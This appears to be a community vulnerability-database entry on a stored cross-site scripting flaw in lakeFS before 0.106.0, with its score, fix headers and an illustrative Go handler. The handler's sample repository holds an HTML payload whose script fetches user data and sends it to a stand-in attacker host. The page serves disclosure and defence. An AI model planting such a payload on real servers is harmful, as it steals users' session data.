
Cloud Vulnerability DB
A community-led vulnerabilities database
GHSA-9phh-r37v-34wh affects lakeFS versions prior to 0.106.0 and was disclosed on August 14, 2023. It is an arbitrary JavaScript injection, in effect a stored cross-site scripting flaw: lakeFS served objects stored in a repository under their recorded content type, so a direct link to an uploaded HTML file made the browser render that file, and run any JavaScript in it, in the origin of the lakeFS server (GitHub Advisory).
The issue carries a CVSS 3.1 base score of 5.8 (Moderate): Network attack vector, High attack complexity, Low privileges required, User interaction required, Changed scope, High confidentiality impact, and no integrity or availability impact. The vector string is CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N; the scope is Changed because the injected script executes in the victim's browser rather than in the lakeFS component that holds the flaw (GitHub Advisory).
Because the page is rendered in the lakeFS origin, the injected script can run inline, load resources from other domains, and issue arbitrary HTTP requests that carry the victim's lakeFS session. The result is exfiltration of data to a domain the attacker controls, or lakeFS operations performed in the victim's name. Two preconditions limit the attack: the attacker must already have enough access to upload an HTML file into a repository, and the victim must open a direct link to that file (GitHub Advisory).
The fix shipped in lakeFS 0.106.0 and adds security headers to responses that serve object content: Content-Security-Policy: default-src 'none', which blocks inline script and every subresource or request the document might make; X-Content-Type-Options: nosniff, which stops the browser from upgrading an ambiguous type to HTML; and X-Frame-Options: DENY, which prevents framing by other sites. No workaround is available for users who cannot upgrade (GitHub Commit, GitHub Release).
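The handler below is an added example written for this page, not lakeFS's own code. It models the two behaviours described above in a small Go HTTP handler: serving a stored object under its recorded Content-Type with no protective headers (the pre-0.106.0 behaviour), and the same handler with the three headers from the fix. The repository contents, paths and the attacker's HTML payload are constructed for the example; the function and type names are assumptions, not lakeFS identifiers.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// storedObject is a constructed stand-in for an object in a lakeFS repository:
// the bytes a user uploaded plus the Content-Type recorded at upload time.
type storedObject struct {
	contentType string
	body        []byte
}

// A constructed repository: one harmless CSV and one HTML file whose inline
// script would run in the serving origin if the browser renders it.
var repo = map[string]storedObject{
	"/repo/main/data.csv": {"text/csv", []byte("id,value\n1,42\n")},
	"/repo/main/page.html": {"text/html", []byte(
		`<html><body><script>fetch("/api/v1/user").then(r=>r.text()).then(t=>location="https://attacker.example/?"+t)</script></body></html>`)},
}

// objectHandler returns the raw object bytes under the stored Content-Type.
// With hardened=false it models the pre-0.106.0 behaviour: text/html is
// rendered by the browser in the server's origin, so the script above runs
// with the victim's session. With hardened=true it adds the response headers
// named in the 0.106.0 fix, which stop the browser from executing or loading
// anything from the rendered document.
func objectHandler(hardened bool) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		obj, ok := repo[r.URL.Path]
		if !ok {
			http.NotFound(w, r)
			return
		}
		if hardened {
			// No scripts, styles, images, fetches or frames of any kind.
			w.Header().Set("Content-Security-Policy", "default-src 'none'")
			// Do not let the browser upgrade an ambiguous type to text/html.
			w.Header().Set("X-Content-Type-Options", "nosniff")
			// Do not let another site embed the object in a frame.
			w.Header().Set("X-Frame-Options", "DENY")
		}
		w.Header().Set("Content-Type", obj.contentType)
		w.Write(obj.body)
	})
}

// fetchObject performs an in-process GET and returns the recorded response.
func fetchObject(h http.Handler, path string) *httptest.ResponseRecorder {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, path, nil))
	return rec
}

// scriptWouldRun is the check to apply to each response: an HTML body is a
// live XSS sink unless a CSP forbids script execution. Only the exact policy
// from the fix is recognised here; a production check would parse the policy.
func scriptWouldRun(rec *httptest.ResponseRecorder) bool {
	ct := rec.Header().Get("Content-Type")
	csp := rec.Header().Get("Content-Security-Policy")
	return strings.HasPrefix(ct, "text/html") && csp != "default-src 'none'"
}

func main() {
	for _, hardened := range []bool{false, true} {
		h := objectHandler(hardened)
		for _, p := range []string{"/repo/main/data.csv", "/repo/main/page.html"} {
			rec := fetchObject(h, p)
			fmt.Printf("hardened=%-5v %-21s Content-Type=%-9s CSP=%q script-runs=%v\n",
				hardened, p, rec.Header().Get("Content-Type"),
				rec.Header().Get("Content-Security-Policy"), scriptWouldRun(rec))
		}
	}
}
```

Two points worth keeping in mind when reading the hardened branch. The headers must be set before the first write to the body, since Go commits the header block on the first Write; a fix that sets them afterwards silently sends nothing. And default-src 'none' governs script execution and subresource loads, but the HTML itself still renders: CSP directives such as form-action do not fall back to default-src, so the header removes the script-execution and exfiltration paths the advisory describes rather than making user-supplied HTML inert in every respect. After upgrading, requesting any stored object and confirming all three headers are present is the quickest way to verify the fix is in effect.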
Source: This report was generated using AI